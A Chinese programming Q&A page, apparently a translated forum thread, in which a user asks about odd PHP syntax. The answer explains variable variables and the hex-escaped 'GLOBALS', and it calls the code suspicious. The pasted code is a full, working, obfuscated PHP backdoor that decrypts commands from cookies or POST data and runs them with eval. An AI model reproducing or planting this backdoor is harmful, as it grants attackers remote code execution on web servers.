到底是怎么回事?我从未见过这样的PHP语法:$ {“ \ x47 \ x4c \ x4fB \ x41 \ x4c \ x53”} ['v9800']

分类:编程问答

如何解决到底是怎么回事?我从未见过这样的PHP语法:$ {“ \ x47 \ x4c \ x4fB \ x41 \ x4c \ x53”} ['v9800']

此php代码中有一些奇怪的语法:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $hd701 = 475;$GLOBALS['xbe829'] = Array();global $xbe829;$xbe829 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800'] = "\x7a\x7b\x60\x5b\x4a\x56\x6c\x51\x21\x62\x38\x66\x44\xa\x2e\x27\x22\x50\x58\x45\x49\x3d\x79\x43\x23\x3b\x53\x29\x2a\x30\x6b\x73\x63\x9\x77\x6f\x47\x6a\x4e\x54\x39\x3f\x40\x4f\x35\x4b\x26\x34\x6d\x5d\x76\x3a\x3c\x64\x71\x67\x5e\x5c\x46\x6e\x75\x4c\xd\x42\x65\x52\x48\x70\x41\x68\x55\x2b\x57\x5a\x69\x7c\x20\x2c\x28\x74\x59\x3e\x2f\x37\x78\x33\x31\x7d\x61\x5f\x7e\x72\x2d\x24\x36\x25\x4d\x32";$xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]] = $xbe829['v9800'][32].$xbe829['v9800'][69].$xbe829['v9800'][91];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]] = $xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][53];$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]] = $xbe829['v9800'][31].$xbe829['v9800'][79].$xbe829['v9800'][91].$xbe829['v9800'][6].$xbe829['v9800'][64].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]] = $xbe829['v9800'][74].$xbe829['v9800'][59].$xbe829['v9800'][74].$xbe829['v9800'][89].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]] = $xbe829['v9800'][67].$xbe829['v9800'][69].$xbe829['v9800'][67].$xbe829['v9800'][50].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][31].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]] = $xbe829['v9800'][60].$xbe829['v9800'][59].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]] = $xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][94].$xbe829['v9800'][47].$xbe829['v9800'][89].$xbe829['v9800'][53].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][35].$xbe829['v9800'][53].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][74].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]] = $xbe829['v9800'][31].$xbe829['v9800'][32].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][9];$xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]] = $xbe829['v9800'][69].$xbe829['v9800'][86].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][29].$xbe829['v9800'][83];$xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] = $_POST;$xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] = $_COOKIE;@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55],NULL);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][31],0);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][48].$xbe829['v9800'][88].$xbe829['v9800'][84].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][84].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][60].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64],0);@$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]](0);$x7bb89b70 = NULL;$t0e76b849 = NULL;$xbe829[$xbe829['v9800'][67].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][40].$xbe829['v9800'][47]] = $xbe829['v9800'][40].$xbe829['v9800'][44].$xbe829['v9800'][88].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][88].$xbe829['v9800'][85].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][64].$xbe829['v9800'][53].$xbe829['v9800'][10].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][47].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][40].$xbe829['v9800'][64].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][10].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][44].$xbe829['v9800'][47];global $p48307594;function  h16107($x7bb89b70,$he719627){global $xbe829;$gea9ce = "";for ($t69c26=0; $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70);){for ($nb3186c8=0; $nb3186c8<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($he719627) && $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70); $nb3186c8++,$t69c26++){$gea9ce .= $xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]]($xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($x7bb89b70[$t69c26]) ^ $xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($he719627[$nb3186c8]));}}return $gea9ce;}function  scdbab($x7bb89b70,$he719627){global $xbe829;global $p48307594;return $xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($x7bb89b70,$p48307594),$he719627);}foreach ($xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}if (!$x7bb89b70){foreach ($xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}}$x7bb89b70 = @$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]]($xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]]($xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]]($x7bb89b70),$t0e76b849));if (isset($x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]) && $p48307594==$x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]){if ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][74]){$t69c26 = Array($xbe829['v9800'][67].$xbe829['v9800'][50] => @$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]](),$xbe829['v9800'][31].$xbe829['v9800'][50] => $xbe829['v9800'][86].$xbe829['v9800'][14].$xbe829['v9800'][29].$xbe829['v9800'][92].$xbe829['v9800'][86],);echo @$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]]($t69c26);}elseif ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][64]){eval/*l551d*/($x7bb89b70[$xbe829['v9800'][53]]);}exit();} ?>

我特别好奇,这是什么样的语法?

${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800']

解决方法

首先,为了解决代码语法本身,PHP允许您动态创建变量名。

假设您有一个变量:

$test = 123;

您可以像这样动态创建对此变量的引用:

echo ${'test'};  // Prints '123'

您为什么要这样做?好了,上面的示例毫无意义,但是假设您需要在运行时动态地运行一些变量名:

$var1 = 'A';
$var2 = 'B';
$var3 = 'C';

for ($i = 1; $i <= 3; $i++) {
    echo ${'var' . $i};
}

// Prints 'ABC'

因此,既然我们知道语法的含义,\x47\x4c\x4fB\x41\x4c\x53是什么意思?

\x用于转义十六进制字符序列。简而言之,您显示的字符串是一堆有人用十六进制表示的字符,而不是您惯常看到的人类可读的ASCII字符。

如果我们摆脱了\x转义部分,我们将得到:

474c4fB414c53

据我所知,此处的B并不是十六进制的。这给我们留下了

474c4f 414c53

翻译为:

GLO ALS

如果我们替换B,我们将得到:

GLOBALS

如果我们将其重新添加到动态变量引用中,然后再次查看代码,则会得到:

$GLOBALS['v9800']

这很有趣,因为$GLOBALS是PHP中可用的特殊数组,它可以访问全局范围内的所有变量。因此,从本质上讲,您的代码正在尝试访问名为$v9800的全局变量。

您将不得不决定这对您的应用程序意味着什么,但是此代码可能是可疑的。可能是有人故意使用这种神秘的方法伪装了他们的代码,以尝试访问全局变量。

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐

导入项目后报错问题
依赖报错 idea导入项目后依赖报错,解决方案:https://blog.csdn.net/weixin_42420249/article/details/81191861 依赖版本报错:更换其他版本 无法下载依赖可参考:https://blog.csdn.net/weixin_42628809/a
idea不能识别yaml文件
使用mybatis plus常见错误
错误1:代码生成器依赖和mybatis依赖冲突 启动项目时报错如下 2021-12-03 13:33:33.927 ERROR 7228 [ main] o.s.b.d.LoggingFailureAnalysisReporter : *************************** APPL
gradle常见问题与错误
错误1:gradle项目控制台输出为乱码 # 解决方案:https://blog.csdn.net/weixin_43501566/article/details/112482302 # 在gradle-wrapper.properties 添加以下内容 org.gradle.jvmargs=-Df
Mybatis Plus传入参数0不起作用
错误还原:在查询的过程中,传入的workType为0时,该条件不起作用 &lt;select id=&quot;xxx&quot;&gt; SELECT di.id, di.name, di.work_type, di.updated... &lt;where&gt; &lt;if test=&qu
linux中make编译源码包失败
报错如下,gcc版本太低 ^ server.c:5346:31: 错误:‘struct redisServer’没有名为‘server_cpulist’的成员 redisSetCpuAffinity(server.server_cpulist); ^ server.c: 在函数‘hasActiveC
微服务启动错误:Command line is too long. Shorten command line for
解决方案1 1、改项目中.idea/workspace.xml配置文件,增加dynamic.classpath参数 2、搜索PropertiesComponent,添加如下 &lt;property name=&quot;dynamic.classpath&quot; value=&quot;tru
vue常见错误
删除根组件app.vue中的默认代码后报错:Module Error (from ./node_modules/eslint-loader/index.js): 解决方案:关闭ESlint代码检测,在项目根目录创建vue.config.js,在文件中添加 module.exports = { lin
spark常见错误
查看spark默认的python版本 [root@master day27]# pyspark /home/software/spark-2.3.4-bin-hadoop2.7/conf/spark-env.sh: line 2: /usr/local/hadoop/bin/hadoop: No s
matplotlib报错:AttributeError: module 'backend_interagg' has no attribute 'FigureCanvas'. Did you mean: 'FigureCanvasAgg'?
使用本地python环境可以成功执行 import pandas as pd import matplotlib.pyplot as plt # 设置字体 plt.rcParams[&#39;font.sans-serif&#39;] = [&#39;SimHei&#39;] # 能正确显示负号 p
gitlab登录失败,报错:This challenge page was accidentally cached by an intermediary and is no longer available.
设置时间 控制面板
后端开发常见错误
错误1:Request method ‘DELETE‘ not supported 错误还原:controller层有一个接口,访问该接口时报错:Request method ‘DELETE‘ not supported 错误原因:没有接收到前端传入的参数,修改为如下 参考 错误2:cannot r
docker常见错误
错误1:启动docker镜像时报错:Error response from daemon: driver failed programming external connectivity on endpoint quirky_allen 解决方法:重启docker -&gt; systemctl r
idea常见错误
错误1:private field ‘xxx‘ is never assigned 按Altʾnter快捷键,选择第2项 参考:https://blog.csdn.net/shi_hong_fei_hei/article/details/88814070 错误2:启动时报错,不能找到主启动类 #
pip安装依赖失败
报错如下,通过源不能下载,最后警告pip需升级版本 Requirement already satisfied: pip in c:\users\ychen\appdata\local\programs\python\python310\lib\site-packages (22.0.4) Coll
maven常见错误
错误1:maven打包报错 错误还原:使用maven打包项目时报错如下 [ERROR] Failed to execute goal org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources (default-resources)
cloud项目中常见错误
错误1:服务调用时报错 服务消费者模块assess通过openFeign调用服务提供者模块hires 如下为服务提供者模块hires的控制层接口 @RestController @RequestMapping(&quot;/hires&quot;) public class FeignControl
springboot常见错误
错误1:运行项目后报如下错误 解决方案 报错2:Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile (default-compile) on project sb 解决方案:在pom.
springmvc拦截器中使用redisTemplate报空指针异常
参考 错误原因 过滤器或拦截器在生效时,redisTemplate还没有注入 解决方案:在注入容器时就生效 @Component //项目运行时就注入Spring容器 public class RedisBean { @Resource private RedisTemplate&lt;String
vite报错:npm ERR! command C:WINDOWSsystem32cmd.exe /d /s /c C:UsersychenAppDataLocalTempnpx-dde1c848.cmd
使用vite构建项目报错 C:\Users\ychen\work&gt;npm init @vitejs/app @vitejs/create-app is deprecated, use npm init vite instead C:\Users\ychen\AppData\Local\npm-
pythonJavaScriptjavaHTMLPHPreactjsC#AndroidCSSNode.jssqlrpython-3.xMysqLjQueryc++pandasFlutterangularIOSdjangolinuxswifttypescript路由器JSON路由器设置无线路由器h3c华三华三路由器设置华三路由器电脑软件教程arraysdocker软件图文教程Cvue.jslaravelspring-boot